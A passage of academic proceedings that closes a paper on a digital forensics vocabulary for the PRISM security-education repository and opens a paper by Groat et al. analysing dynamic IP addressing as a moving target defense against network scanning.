results. Since IA terminology varies widely among researchers and practitioners, we have tried to<br />

accommodate the broadest possible group of users by developing several taxonomies to tag content.<br />

After a resource has been associated with a particular taxonomy term, it can automatically be<br />

included in guided searches and is reachable with the advanced search function of PRISM. At the<br />

conclusion of the first major development phase, PRISM was equipped with both the International<br />

Information Systems Security Certification Consortium (Theoharidou and Gritzalis 2007) and U.S.<br />

Department of Homeland Security CBK vocabularies (Shoemaker, Drommi, Ingalsbe and Mead<br />

2007). However, in simple use cases existing vocabularies did not offer a sufficient level of specificity.<br />

Rather than create arbitrary lists of terms a researcher might personally want to search for, it was<br />

decided to review the literature and attempt to distill vocabularies that would reflect common usage<br />

among curriculum developers.<br />

The first effort to granularize the PRISM taxonomies was in the area of digital forensics. Digital<br />

forensics is its own discipline within the realm of information security (Berghel 2003). On this basis,<br />

forensics is considered an ideal candidate for a descriptive taxonomy within PRISM. PRISM<br />

researchers analyzed nine recent publications, primarily from curriculum developers, to identify a<br />

common taxonomic structure and current terminology usage. These publications were selected for<br />

their recent contribution and, based on the level of repetition of terms observed, were considered<br />

adequate in number and scope to generate an initial forensics vocabulary for PRISM. The digital<br />

forensics vocabulary currently being used in PRISM contains the most commonly observed digital<br />

forensics terms from these nine papers, and will explicitly specify relationships between synonyms as<br />

they are identified through site analytics. Table 1 shows the initial list of terms implemented within<br />

PRISM (See Appendix 1 for the complete table). To keep the list to a manageable size, only terms<br />

referenced in at least one third of the papers analyzed were included in this initial vocabulary.<br />

Table 1: PRISM’s initial digital forensics vocabulary<br />

Forensics Topics          Reference Count<br />
Legal Process             6<br />
Log Analysis              6<br />
Data Acquisition          5<br />
Data Decryption           5<br />
Deleted Data Recovery     5<br />
Email Forensics           5<br />
Hidden Data Discovery     5<br />
Steganography             5<br />
Documentation             4<br />
Ethics                    4<br />
Network Forensics         4<br />
Incident Response         3<br />
Live System Forensics     3<br />
Malware Detection         3<br />
Password Cracking         3<br />
Registry Analysis         3<br />




To avoid creating too much predefined structure and possibly over-restricting the way users interact<br />

with the site, a single, flat vocabulary of forensics-related terms was defined, as opposed to a<br />

hierarchical one. This accommodates variance in how users define and use<br />
terms. Furthermore, terms that refer to conceptual subsets of other terms are included in the<br />

vocabulary because they are apparently often used independently of their parent terms in the<br />

literature. For example, “Steganography” could be conceptually categorized as “hidden data<br />

discovery”, but more than half of the papers examined explicitly mentioned the former term. This is an<br />

example of a deterministic approach: allowing actual usage of terms to dictate taxonomy<br />

development.<br />

4.2 Dealing with added complexity<br />

As the taxonomy structure becomes more complex, a tradeoff between the ease of content searching<br />

and the difficulty of content submission is made. To offset the effects of PRISM’s more complex<br />

taxonomy system, PRISM moderators will categorize content for developers. By offering this service,<br />

the difficulty of content submission is reduced, requiring only the submission of a link or the upload of<br />
an archive to be posted.<br />

4.3 A trial of the system<br />

We used Regis University’s Computer Forensics course to evaluate the list of terms derived from the<br />

literature (Table 1) and their ability to describe the computer forensics materials. The premise of the<br />

course is to introduce the student to a wide variety of methods for investigating computer security<br />

incidents. Each student takes on the role of a forensic analyst and each week the student is asked to<br />

apply their skills to the analysis of many different types of data with different scenarios and tools. The<br />

students have to create log entries detailing their findings as they work through the process of<br />

analyzing the data for each scenario. First, we chose terms from the vocabulary that we felt<br />

represented the lab content and learning intent. These lists, given in Table 2, column 2, represent the<br />

values a content creator would assign to their own materials upon upload to the PRISM site. Next<br />

those terms were compared with actual language used to describe the lab content in the course<br />

syllabus, and a rating was given to the level of similarity between the available vocabulary terms and<br />

those explicitly listed in the lab topic descriptions. A “Yes” value suggests that the terminology was<br />

sufficiently similar to allow someone not familiar with the content of the lab to effectively classify data<br />

using only a brief description. A “Partial” value means that one or more, but not all of the vocabulary<br />

terms are reflected in the lab topic description. In this case, a material might not be classified under all<br />

relevant terms, making it difficult to locate on the site. As an example, the lab described in the first row<br />

of Table 2 might only be classified as an “Email Forensics” material since “Documentation” and “Legal<br />

Process” are not explicitly mentioned in the description. Finally, a “No” designation is given if none of<br />

the relevant vocabulary terms are present in the lab topic description.<br />
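The Yes/Partial/No ratings described here were assigned by human judgment of similarity; as a rough illustration, the rating logic can be sketched as follows (hypothetical helper and data, with naive substring matching standing in for that judgment):

```python
def rate_match(lab_description: str, assigned_terms: list[str]) -> str:
    """Rate how fully a set of vocabulary terms is reflected in a lab description."""
    text = lab_description.lower()
    hits = sum(1 for term in assigned_terms if term.lower() in text)
    if hits == len(assigned_terms):
        return "Yes"      # every assigned term appears in the description
    if hits > 0:
        return "Partial"  # one or more, but not all, terms appear
    return "No"           # no assigned term appears

# Mirrors the first row of Table 2: only "Email Forensics" is explicit.
desc = ("Email Forensics and the Forensic Template. Also write a preface "
        "justifying the forensic approach.")
print(rate_match(desc, ["Email Forensics", "Documentation", "Legal Process"]))  # Partial
```

A material rated "Partial" by this scheme would, as noted above, risk being classified under only a subset of its relevant terms.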

Table 2: Summary of the weekly lab topics from the MSIA 680 Computer Forensics course and related PRISM forensics vocabulary terms<br />

Lab Topics from Syllabus | Related PRISM Forensics Terms | Match<br />
Email Forensics and the Forensic Template. Also write a preface justifying the forensic approach. | Email Forensics; Documentation; Legal Process | Partial<br />
Snort alert data and Wireshark packet capture; Network Security Podcast Report | Network Forensics; Log Analysis | No<br />
Live Response, Volatile & Nonvolatile Data, Cache Dump | Live System Forensics | Yes<br />
RAPIER Tool Analysis. End with analysis of the Strength and Weakness of Forensic Tools and Processes | Log Analysis; Hidden Data Discovery; Documentation; Tool Validation* | No<br />
Registry Examination and Tool usage | Registry Analysis | Yes<br />
File Analysis Lab | Hidden Data Discovery | No<br />
Active Malware Discovery (Trojans) and Memory Examination | Malware Detection; Hidden Data Discovery | Yes<br />
Rootkit Examination and research of additional risks and methods of detection | Malware Detection | Yes<br />


Vincent Garramone and Daniel Likarish<br />

Note: A positive in the Match column indicates that the seeded taxonomy terms were closely or<br />

exactly reflected in the Regis lab topic.<br />

This rudimentary analysis demonstrated that seeding the forensics vocabulary with terms extracted<br />

from a public literature search might be sufficient to allow a moderator to characterize the uploaded<br />

material without intimate knowledge of its contents. See Appendix 2 for a visual representation of this<br />

mapping in table form for the course MSIA 682, Network Forensics. It is clear, however, that the initial<br />

vocabulary could benefit from adjustments. For example, the lab description in row 2 of Table 2<br />

mentions “packet capture”. While this is not in the initial vocabulary, it is closely related to “Network<br />

Forensics” and “Packet Analysis”. Network Forensics was included in the initial list and Packet<br />

Analysis, while identified in the literature, was not for reasons described above. To address this, it<br />

might be appropriate to replace “Network Forensics” with “Packet Analysis” in the PRISM vocabulary.<br />

Alternatively, defining the relationship of these terms in PRISM (synonyms, subtopics, etc.) might<br />

create a more inclusive and useful search environment.<br />

4.4 Honing the vocabulary<br />

The artifact constructed through literature review is, as mentioned, a starting point in the development<br />

of an optimized digital forensics vocabulary for PRISM. It remains to be seen if these terms resonate<br />

with other users of the web portal or if different descriptors will be favored. Moreover, terminology<br />

changes over time, and PRISM’s vocabularies should be able to accommodate those changes. The<br />

authors plan to utilize new content and analytics data to identify discrepancies between the<br />

vocabulary defined above and actual topics and terms utilized by PRISM users. PRISM records all<br />

searches performed on the site and generates reports listing common phrases. Searches are also<br />

tracked by Google Analytics, which provides a more in-depth view of searches executed on the site,<br />

as well as visitor behavior before and after the search. After a particular search is executed, Google<br />

services can be used to determine users’ preferred or selected materials. This capability can provide<br />

insight into how accurate and relevant the taxonomies are at any given time. As long as usage of the<br />

site continues, these tools will help PRISM moderators to maintain relevant IA vocabularies from<br />

which content can be described.<br />
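A minimal sketch of this analytics-driven refinement, with hypothetical search-log data standing in for PRISM's actual reports: count logged search phrases and surface those missing from the current vocabulary.

```python
# Hypothetical sketch: compare logged search phrases against the current
# PRISM vocabulary to surface frequently searched but missing terms.
from collections import Counter

vocabulary = {"network forensics", "log analysis", "email forensics"}

# Stand-in for phrases pulled from PRISM's search logs or Google Analytics.
logged_searches = [
    "packet analysis", "log analysis", "packet analysis",
    "registry analysis", "network forensics", "packet analysis",
]

counts = Counter(phrase.lower() for phrase in logged_searches)
missing = {phrase: n for phrase, n in counts.items() if phrase not in vocabulary}
print(missing)  # {'packet analysis': 3, 'registry analysis': 1}
```

High-count entries in `missing` would be candidates for addition to the vocabulary, or for linking as synonyms or subtopics of existing terms.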

5. Conclusions<br />

IA is a rapidly changing field, and maintaining relevance is a difficult task. We are attempting to keep<br />

PRISM responsive to changes in the IA landscape. PRISM developers will continue to make<br />

adjustments based on the needs of the user community by allowing current literature and actual<br />

usage statistics to guide the development of organizational taxonomies. Explicitly attaching these<br />

relevant descriptors to site content allows administrators to produce intuitive, guided search<br />

functionalities, making it easier for users to locate the materials they need. Results using our own<br />

materials as a test case suggest that taxonomies constructed in this way could be effective for other<br />

users. A more rigorous evaluation will only be possible if site utilization increases and is sustained<br />

over a significant period of time. To this end, PRISM moderators recognize, and are prepared to<br />

absorb, the increased work required to properly organize content on the site as taxonomic complexity<br />

increases. This will hopefully make using the site more attractive to content developers and, in turn, to<br />

those seeking educational resources.<br />

6. Appendix 1: Terminology usage matrix<br />

Forensics Topics Totals<br />

Legal Process [1] [3] [5] [6] [11] [12] 6<br />

Log Analysis [1] [3] [5] [6] [11] [13] 6<br />

Data Acquisition [1] [2] [3] [12] [13] 5<br />

Data Decryption [1] [2] [5] [11] [12] 5<br />

Deleted Data Recovery [1] [3] [6] [11] [12] 5<br />

Email Forensics [2] [3] [5] [6] [13] 5<br />

Hidden Data Discovery [1] [2] [3] [11] [12] 5<br />

Steganography [1] [5] [11] [12] [13] 5<br />

Documentation [1] [2] [5] [13] 4<br />

Ethics [6] [11] [12] [13] 4<br />


Network Forensics [3] [6] [11] [13] 4<br />

Incident Response [11] [12] [15] 3<br />

Live System Forensics [1] [3] [15] 3<br />

Malware Detection [3] [11] [12] 3<br />

Password Cracking [2] [5] [13] 3<br />

Registry Analysis [3] [6] [13] 3<br />

Hardware Identification [2] [6] 2<br />

Tool Development [3] [11] 2<br />

Web Browser Forensics [6] [13] 2<br />

Baselining [3] 1<br />

Application Analysis [6] 1<br />

Data Reconstruction [6] 1<br />

Forensic Planning 1<br />

Key Loggers [3] 1<br />

Dead System Forensics [15] 1<br />

Packet Analysis [6] 1<br />

Password Auditing [3] 1<br />

RFID Forensics [6] 1<br />

Tool Validation [11] 1<br />

Web Services [6] 1<br />

Evidence Collection and Handling [5] 1<br />

Key | Authors | Year | Country | Subject<br />
[1] | Bem, D. and Huebner, E. | 2008 | Australia | Curriculum<br />
[2] | Berghel, H. | 2003 | USA | Definition<br />
[3] | Crowley, E. | 2007 | USA | Curriculum (corporate)<br />
[5] | Figg, W. and Zhou, Z. | 2007 | USA | Curriculum<br />
[6] | Francia, G. A. | 2006 | USA | Curriculum<br />
[11] | Troell, L., Pan, Y., and Stackpole, B. | 2003 | USA | Curriculum<br />
[12] | Troell, L., Pan, Y., and Stackpole, B. | 2004 | USA | Curriculum<br />
[13] | Wassenaar, D., Woo, D., and Wu, P. | 2009 | USA | Curriculum<br />
[15] | Yen, P., Yang, C., and Ahn, T. | 2009 | Taiwan | Process<br />

7. Appendix 2: MSIA 682, Network Forensics course topics and activities<br />

mapped to PRISM forensics vocabulary<br />

Course Topic | Activity Description | Example of a Granular Lab Activity | PRISM Forensics Vocabulary<br />
Introduction to Security Monitoring | Intro Security packet data structure based on the TCP/IP model | Identify the following packet structures by explaining what each packet is, what ports, protocols or codes each one uses using the static packet captures | Network Forensics<br />
Protocol Analysis | After understanding packet data structures, examine different types of network services using standard sniffing tools | Explain the following tcpdump flags: -v, -n, -i, -r, -w, -e, -t, -x, -X, -s, -D, -q, -L; identify which flags can be used more than once. Please use the 7.pcap file for this exercise. | Network Forensics; Live Systems Forensics<br />
Metadata and Statistical Analysis | Decompose packets for the content: metadata and other attributes using packet capture files | Examine the files 1.pcap through 6.pcap using either Netdude or Wireshark, explaining what protocols are in use, whether they use UDP or TCP and what ports are used for each protocol. | Log Analysis; Hidden Data Discovery<br />
Session Data, Intrusion Detection and Alert Data | Investigate layer three and four session data using the Network Security Management Framework | Please review the nfsen video to review the capabilities of nfsen (a web front end) and nfdump, the netflow collector/provider. | Log Analysis; Hidden Data Discovery<br />
Normal, Suspicious and Malicious Traffic | Examples of normal, suspicious and malicious traffic based on pcap files | Please examine pcap files 1-7 and identify the type of traffic and whether or not it would be normal, suspicious or malicious. | Malware Detection; Live Systems Forensics; Hidden Data Discovery<br />

References<br />

Bem, D. and Huebner, E. (2008) “Computer forensics workshop for undergraduate students”, In Proceedings of<br />

the tenth conference on Australasian computing education, Vol. 78, Simon Hamilton and Margaret Hamilton<br />

(Eds.), Australian Computer Society, Inc., Darlinghurst, Australia, pp 29-33.<br />

Berghel, H. (2003) “The discipline of Internet forensics”, Communications of the ACM, Vol. 46, No. 8, pp 15-20.<br />

DOI= http://doi.acm.org/10.1145/859670.859687<br />

Cooper, S., Nickell, C., Piotrowski, V., Oldfield, B., Abdallah, A., Bishop, M., Caelli, B., Dark, M., Hawthorne, E.,<br />

Hoffman, L., Perez, L., Pfleeger, C., Raines, R., Schou, C., and Brynielsson, J. (2010) “An exploration of the<br />

current state of information assurance education”, SIGCSE Bull, Vol. 41, No. 4, pp 109-125.<br />

DOI=10.1145/1709424.1709457<br />

Crowley, E. (2007) “Corporate forensics class design with open source tools and live CDS”, J. Comput. Small<br />

Coll. Vol. 22, No. 4, pp 170-176.<br />

Davis, H., Carr, L., Hey, J., Howard, Y., Millard, D., Morris, D., and White, S. (2010) “Bootstrapping a culture of<br />

sharing to facilitate open educational resources”, IEEE Transactions on Learning Technologies, Vol. 3, No.<br />

2, pp 96-109.<br />

Dicheva, D. and Dichev, C. (2006) “Tm4l: creating and browsing educational topic maps”, British Journal of<br />

Educational Technology, Vol. 37, No. 3, pp 391-404.<br />

Figg, W. and Zhou, Z. (2007) “A computer forensics minor curriculum proposal”, J. Comput. Small Coll, Vol. 22,<br />

No. 4, pp 32-38.<br />

Francia, G. A. (2006) “Digital forensics laboratory projects”, J. Comput. Small Coll, Vol. 21, No. 5, pp 38-44.<br />

Garramone, V. and Schweitzer, D. (2010) “PRISM: A public repository for information security material”, In<br />

Proceedings from the 14th Annual Colloquium for Information Systems Security Education, Baltimore, MD.<br />

Irvine, C., Chin, S., and Frincke, D. (1998) “Integrating security into the curriculum”, Computer, Vol. 31, No. 12,<br />

pp 25-30.<br />

Moisey, S. Alley, M. & Spencer, B. (2006) “Factors affecting the development and use of learning objects”, The<br />

American Journal of Distance Education, Vol. 20, No. 3, pp 143-161.<br />

Null, L. (2004) “Integrating security across the computer science curriculum”, Journal of Computing Sciences in<br />

Colleges, Vol. 19, No. 5, pp 170-178.<br />

Peisert, S., Bishop, M., and Marzullo, K. (2008) “Computer forensics in forensics”, SIGOPS Oper. Syst. Rev., Vol.<br />

42, No. 3, pp 112-122. DOI= http://doi.acm.org/10.1145/1368506.1368521<br />


Schweitzer, D. and Boleng, J. (2009) “Designing web labs for teaching security concepts”, J. Comput. Small Coll.,<br />

Vol. 25, No. 2, pp 39-45.<br />

Shoemaker, D., Drommi, A., Ingalsbe, J.A., and Mead, N.R. (2007) “A comparison of the software assurance<br />

common body of knowledge to common curricular standards”, Software Engineering Education & Training,<br />

2007, pp 149-156.<br />

Theoharidou, M. and Gritzalis, D. (2007) “Common body of knowledge for information security”, Security &<br />

Privacy, IEEE, Vol. 5, No. 2, pp 64-67. DOI=10.1109/MSP.2007.32<br />

Troell, L., Pan, Y., and Stackpole, B. (2003) “Forensic course development”, In Proceedings of the 4th<br />

Conference on Information Technology Curriculum, 16-18 October, ACM, New York, NY, pp 265-269.<br />

DOI=http://doi.acm.org/10.1145/947121.947180<br />

Troell, L., Pan, Y., and Stackpole, B. (2004) “Forensic course development: one year later”, In Proceedings of the<br />

5th Conference on Information Technology Education, 28-30 October, ACM, New York, NY, pp 50-55.<br />

DOI=http://doi.acm.org/10.1145/1029533.1029547<br />

Wassenaar, D., Woo, D., and Wu, P. (2009) “A certificate program in computer forensics”, J. Comput. Small Coll.,<br />

Vol. 24, No. 4, pp 158-167.<br />

Weibel, S., Kunze, J., Lagoze, C. and Wolf, M. (1998) “Dublin Core Metadata for Resource Discovery”, RFC<br />

Editor, US.<br />

Yen, P., Yang, C., and Ahn, T. (2009) “Design and implementation of a live-analysis digital forensic system”, In<br />

Proceedings of the 2009 International Conference on Hybrid Information Technology, 27-29 August, Vol.<br />

321, ACM, New York, NY, pp 239-243. DOI=http://doi.acm.org/10.1145/1644993.1645038<br />



Using Dynamic Addressing for a Moving Target Defense<br />

Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront<br />

Virginia Polytechnic Institute and State University, Blacksburg, USA<br />

sgroat@vt.edu<br />

dunlop@vt.edu<br />

marchany@vt.edu<br />

jgtront@vt.edu<br />

Abstract: Static network addressing allows attackers to geographically track hosts and launch network<br />

attacks. While technologies such as DHCP claim dynamic addressing, the majority of network addresses<br />

currently deployed are static for at least a session. Dynamic addresses, changing multiple times within a session,<br />

disassociate a user from a static address. This disassociation is important since a static address can be used to<br />

identify a host and makes targeting the host for attack feasible. We propose using dynamic addressing, in which<br />

hosts’ addresses change multiple times per session, to create a moving target defense. Analyzing the primary<br />

factors which contribute to the security of dynamic addressing, we statistically evaluate the validity of this<br />

technique as a network defense. We then identify the optimal characteristics of a network-layer moving target<br />

defense that uses dynamic addressing.<br />

Keywords: moving target defense, network address security, privacy, dynamic addressing<br />

1. Introduction<br />

As computers and networks become embedded in critical services throughout society, the privacy and<br />

security implications of fixed network addresses expose users to tracking and attack. Specifically, at<br />

the link layer, Media Access Control (MAC) addresses associated with a network interface are<br />

susceptible to flooding and spoofing attacks. At the network layer, Internet Protocol (IP) addresses<br />

are susceptible to spoofing, tracking, and targeting. Both the MAC and IP addresses of servers and<br />

other host machines are usually static to allow for clients to successfully communicate. These static<br />

addresses often leave servers vulnerable to attack because these fixed addresses are easy targets to<br />

locate. If the host is compromised, an attacker can create a denial of service (DoS) attack on the<br />

server which affects all attached clients. Another concern is mobile hosts whose non-changing<br />

network addresses can be geotemporally tracked, compromising users’ privacy.<br />

We explore the variables that impact how effectively dynamic IP addressing protects hosts and the<br />

impact these variables have on each other. One variable is the number of dynamic bits in the<br />

address, or bits available to change. The fewer dynamic bits, the more likely an attacker can use brute<br />

force techniques to correlate addresses. Another variable is the frequency of the address change. An<br />

address with fewer dynamic bits needs to change more often to avoid identification. No temporary<br />

address can remain static for too long without risking data correlation. A third variable to consider is<br />

the population density of the address space or subnet. A sparsely populated subnet would make<br />

address identification easier for the attacker since fewer addresses are in use. Alternatively, a densely<br />

populated subnet would make address identification considerably more challenging due to the<br />

additional hosts creating traffic on the network. Although it is easy to simply maximize all the<br />

variables, computational overhead prevents this. Minimizing computational expense is particularly<br />

important for power-constrained devices.<br />

To combat the security and privacy concerns of non-changing addressing, we analyze how dynamic<br />

network addressing would increase security, privacy, and reliability. Dynamic addressing refers to<br />

addresses in which some or all of the address changes non-deterministically, possibly even mid-session.<br />

Dynamic addressing prevents would-be attackers from tracking users over time and as they<br />

move through different networks, because the changing addresses cannot be correlated to a single<br />

user. Dynamic addressing also protects against traffic correlation by network sniffing attacks because<br />

of the difficulty of associating a user with a changing address. Dynamic addressing provides<br />

additional security by creating a moving target defense at the network layer that prevents attackers<br />

from targeting specific machines. The increased security offered by dynamic network addressing<br />

protects privacy and data for network users.<br />

To analyze the use of dynamic addresses in creating a moving target defense, the remainder of the<br />

paper is organized as follows. Static addresses and their associated security risks are discussed in<br />

Section 2. Related work is surveyed in Section 3, focused on analyzing the need for address privacy.<br />



Stephen Groat et al.<br />

Sections 4 and 5 analyze the different factors which affect the security of a dynamic address and how<br />

these factors affect each other. Section 6 uses statistical simulation results to validate our security<br />

analysis of dynamic addressing factors. In Section 7, we discuss specific security advantages offered<br />

by dynamic addresses. Future work planned to demonstrate a dynamic addressing approach is<br />

discussed in Section 8 and we conclude in Section 9.<br />

2. Problem<br />

Static addresses are necessary to allow users to repeatedly find resources. Without providing a<br />

notification of an address change, users must have a single, static identifier to locate resources. For<br />

example, IP addresses, whether static or dynamic, are often connected with Domain Name System<br />

(DNS) names. DNS names are updated with the current IP address to facilitate location of resources<br />

on the Internet with an easily recognizable value. Without a static value connected to networked<br />

resources, whether DNS names or IP addresses, users would be unable to find the resources. Even<br />

Dynamic Host Configuration Protocol (DHCP) leased addresses, which are widely assumed to be<br />

dynamic, rarely change.<br />

While static addressing is critical to assist users in finding resources, static addresses allow malicious<br />

users to easily locate targets for attack. For example, DNS names and IP addresses are publicly<br />

available static addresses. These vectors allow attackers to easily conduct scans to locate target<br />

hosts. Once a target is located, the attacker can focus on the target found and assume that the<br />

target’s static identifier will not change. An attacker is able to make this assumption since identifier<br />

changes would interrupt service for valid users. To ensure the reliability and security of service, critical<br />

services must deploy some sort of moving target defense that changes static identifiers while allowing<br />

continuity of service for trusted users.<br />

3. Related work<br />

The need for an anonymous network address to maintain security and privacy has been explored.<br />

Reiter and Rubin (1999) developed a scheme, called Crowds, to maintain IP address anonymity from<br />

web sites. The protocol funnels web requests through other computers surfing the web. The<br />

effect is to create a crowd of users browsing web servers to hide web requests. Johnson et al. (2007)<br />

identified the need to anonymize addresses and built a trust model into Tor networks called Nymble.<br />

Nymble hides clients' IP addresses from servers. Shields et al. (2000) created another anonymity<br />

protocol named Hordes. Hordes’ focus is on creating a secure system that does not decrease network<br />

performance. All of these approaches focus on hiding the publicly available addresses by using<br />

complex support networks. We analyze the vectors that static addresses create for tracking and attack<br />

and recommend anonymizing the host address, which none of these three protocols addresses.<br />

Koukis et al. (2006) use web site signatures and fingerprinting to determine host addresses in<br />

anonymized IP logs. This method is ineffective for tracking dynamic hosts, further demonstrating the<br />

potential security and privacy advantages of dynamic addresses.<br />

A number of researchers have focused on the potential dangers resulting from network address<br />

tracking in the Internet Protocol version 6 (IPv6). Dunlop et al. (2011) identified the dangers posed by<br />

auto-configured addresses in IPv6 and presented a taxonomy of methods to obscure addresses.<br />

Narten, Draves, and Krishnan (2007) also identified a privacy concern with IPv6 addresses and<br />

proposed a potential solution called privacy extensions. Privacy extensions can create new addresses<br />

for users each time they connect to a subnet. Bagnulo and Arkko (2006) also proposed a solution<br />

aimed at protecting IPv6 addresses. Their approach, called Cryptographically Generated Addresses<br />

(CGAs), uses a self-generated public key to obscure an address for each subnet. Neither privacy<br />

extensions nor CGAs dynamically obscure addresses; addresses remain the same until the user<br />

terminates the session. Even though the addresses are obscured, they typically remain static long<br />

enough for a malicious third party to gather information about the user.<br />

While we have discovered no other academic work considering the security and privacy effects of<br />

addressing, two patents attempt to utilize dynamic addressing for security. A technique by Sheymov<br />

(2010) is designed with the goal of dynamic obscuration. Sheymov's objective behind dynamic<br />

obscuration is to provide intrusion protection from certain classes of network attacks. While<br />

Sheymov’s method uses dynamic addressing, it relies on an Intrusion Detection System to trigger<br />

address changes. We analyze consistent dynamic address changes that require no additional<br />

systems to support. Fink et al. (2006) also propose a technique for dynamically obscuring host<br />

addresses called Adaptive Self-Synchronized Dynamic Address Translation (ASD). ASD uses<br />


symmetric keys established through a handshake process between a trusted sender and receiver<br />

enclave. This technique adds additional overhead due to repetition of the handshake process. A<br />

dynamic addressing technique must minimize overhead to be feasible for implementation. We analyze<br />

the factors that contribute to creating an effective dynamic addressing technique with the goal of<br />

determining the most efficient approach.<br />

4. Analysis of dynamic address factors<br />

There are three factors that contribute to an attacker’s ability to detect a target host on a subnet. The<br />

first factor is the number of dynamic bits in the address, which affects the size of the subnet. In a<br />

small address space, it is trivial for an attacker to check each address. The second factor is how often<br />

a target host’s address changes. If the address remains static, an attacker has as much time as<br />

necessary to locate the host. The third factor is the density of the address space, or the number of<br />

other hosts on an IP subnet. If an attacker does not know the target host’s address on a subnet,<br />

multiple other addresses will make identifying the target more difficult.<br />

For the purpose of our analysis, we investigate an attacker actively scanning an IP subnet with<br />

unicast addresses to identify a single targeted host. There are other methods an attacker can use to<br />

detect target hosts on a network. One such technique is a broadcast ping, allowed by IPv4. Many<br />

gateway devices block broadcast pings. Another method is to passively scan a subnet with a packet<br />

sniffer. This method has scope limitations as the attacker must have a presence on the same subnet<br />

as the target host. A unicast scan is more likely since there are multiple scanning methods that avoid<br />

common security measures implemented on networks.<br />

4.1 Size of address<br />

The larger the address space, the more time it takes an attacker, on average, to locate the target<br />

address on an IP subnet. Table 1 illustrates this by comparing subnets of various sizes. In the table,<br />

we use the three most common Internet Protocol version 4 (IPv4) classful address blocks as<br />

examples. We also compare the typical subnet size used in IPv6. Scanning an entire class C address<br />

space is trivial and can be accomplished in less than a minute while scanning an entire IPv6 subnet is<br />

currently infeasible.<br />

Table 1: Comparison of addresses of various sizes; the scan time is based on a sequential scan with a 150 millisecond average round trip time for a single packet (GLORIAD 2010)<br />

Address Type | Address Size (bits) | Address Size (hosts) | Scan Time<br />
IPv4 Class C Subnet | 8 | 256 | 38 sec<br />
IPv4 Class B Subnet | 16 | 65,536 | 3 hrs<br />
IPv4 Class A Subnet | 24 | 16,777,216 | 29 days<br />
IPv6 Subnet | 64 | 1.845·10^19 | 8.77·10^10 yrs<br />

So far we have mentioned the time it takes an attacker to scan the various address types in Table 1;<br />
however, this is the time it takes an attacker to scan the entire address space. The expected amount<br />
of time to locate a host is much less due to a paradox known as the birthday attack (Schneier 1996).<br />
According to the birthday attack, an attacker can expect to locate a target host in roughly 2^(m/2) attempts, where<br />
m is the number of bits in the address. What this means is that an attacker can expect to locate a host<br />

on a class C subnet in 2.4 seconds, a class B subnet in 38 seconds, and a class A subnet in 10<br />

minutes. A host on an IPv6 subnet can still expect to escape detection for over 73,500 years. No IPv4<br />

host that is not defending against active scanning can have any expectation of remaining hidden for a<br />

reasonable amount of time.<br />
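The arithmetic above can be reproduced directly, assuming the 150 ms per-probe cost from Table 1 and the standard 2^(m/2) birthday bound:

```python
# Scan-time estimates behind Table 1 and the birthday-attack figures, assuming
# a sequential scan costing 150 ms per probed address (one packet round trip).
RTT = 0.150  # seconds per address probed

def full_scan_seconds(bits: int) -> float:
    """Time to probe all 2**bits addresses in a subnet."""
    return (2 ** bits) * RTT

def birthday_scan_seconds(bits: int) -> float:
    """Expected time to hit a target after about 2**(bits/2) probes."""
    return (2 ** (bits / 2)) * RTT

for name, bits in [("IPv4 class C", 8), ("IPv4 class B", 16),
                   ("IPv4 class A", 24), ("IPv6 /64", 64)]:
    print(f"{name}: full scan {full_scan_seconds(bits):.3g} s, "
          f"expected hit {birthday_scan_seconds(bits):.3g} s")
```

Under these assumptions, a class C subnet is exhaustively scanned in about 38 seconds while an expected hit arrives in roughly 2.4 seconds, matching the figures quoted in the text.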

4.2 Frequency of address change<br />

The more frequently an address changes, the more difficult it is, on average, for an attacker to<br />

successfully locate and target a specific address. This is particularly true if the address changes more<br />

rapidly than an attacker can scan the subnet. As mentioned in Section 4.1, a larger address space<br />

takes longer to scan. It follows that addresses on a larger subnet need to change less frequently. To<br />

understand the relationship between changing and non-changing addresses, we analyze the number<br />

of attempts it takes an attacker to locate a static address on a subnet. Since the address is static, the<br />

probability of an attacker guessing the address increases with each subsequent guess. This<br />


probability follows a hypergeometric distribution. In the case of locating specific hosts on a subnet, the<br />

probability can be written as:<br />

P(r) = 1 − C(N − h, r) / C(N, r)    (1)<br />

(C(n, k) denotes the binomial coefficient.)<br />

where N represents the total possible addresses in the subnet, h represents the target host(s), and r<br />

represents the number of guesses an attacker takes in an attempt to find the target address(es).<br />

The best case for the target host is if its address changes at the same rate that an attacker scans a<br />

single address. To provide the fairest assessment, we assume a scenario where the attacker is aware<br />

of the target host changing his/her address. As a result, the attacker randomizes his/her address<br />

guesses, allowing for repetition of addresses. This is in contrast to the normal approach where an<br />

attacker exhaustively scans a subnet without repetition. The probability of detecting the target host<br />

using an exhaustive search is slightly lower due to the possibility of a host address changing to a<br />

previously guessed address. In the attacker-aware scenario, the probability of detecting the target<br />

host remains the same with each subsequent guess and follows a cumulative binomial distribution as<br />

shown in Equation 2:<br />

P(r) = 1 − (1 − 1/N)^r    (2)<br />

where N again represents the total possible addresses in the subnet and r represents the attempt<br />

during which detection occurs. Figure 1 depicts the difference between the probabilities of a static<br />

address versus a changing address that follows a binomial distribution. A subnet of size 256 hosts is<br />

used as an example for this figure.<br />

Figure 1: The probability an attacker has of detecting a target address within r attempts; the solid line represents the probability given a static address, while the dotted line represents the probability if the address is changed at the same rate it is scanned<br />
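The two curves in Figure 1 can be reproduced numerically. The forms below are reconstructed from the distributions named in the text (hypergeometric for a static target, per-guess binomial for a target that changes address with every probe), not copied from the paper's own equations:

```python
from math import comb

def p_static(r: int, N: int, h: int = 1) -> float:
    # Hypergeometric form (Equation 1): chance of hitting one of h static
    # targets within r distinct guesses out of N possible addresses.
    return 1 - comb(N - h, r) / comb(N, r)

def p_dynamic(r: int, N: int, h: int = 1) -> float:
    # Binomial form (Equation 2): chance of a hit within r guesses when the
    # target re-randomizes its address after every probe.
    return 1 - (1 - h / N) ** r

N = 256  # subnet size used in Figure 1
print(p_static(128, N))   # 0.5: scanning half a 256-address subnet gives even odds
print(p_dynamic(128, N))  # ~0.39: a changing address lowers the attacker's odds
print(p_static(N, N))     # 1.0: an exhaustive scan of a static address always succeeds
```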


It is unlikely, however, that a target address will change at the same rate an attacker scans a subnet.<br />

A target host can decrease the probability of detection compared to a static address by changing its<br />

address more frequently than the time it takes an attacker to scan the entire subnet. In this scenario,<br />

we assume the attacker knows the frequency of the address changes. We make this assumption to<br />

provide the attacker with the highest probability of target detection, and thus demonstrate the worst-case<br />
scenario for the target host. In this scenario, the probability of detecting a target address follows<br />

Equation 1 until the address changes. After the address changes, Equation 1 resets to r=1. If we<br />

classify each address change as a round, the probability of detection on round z can be written as: P(z) = 1 - (1 - r/N)^z (3), where r is the number of addresses the attacker scans between changes.

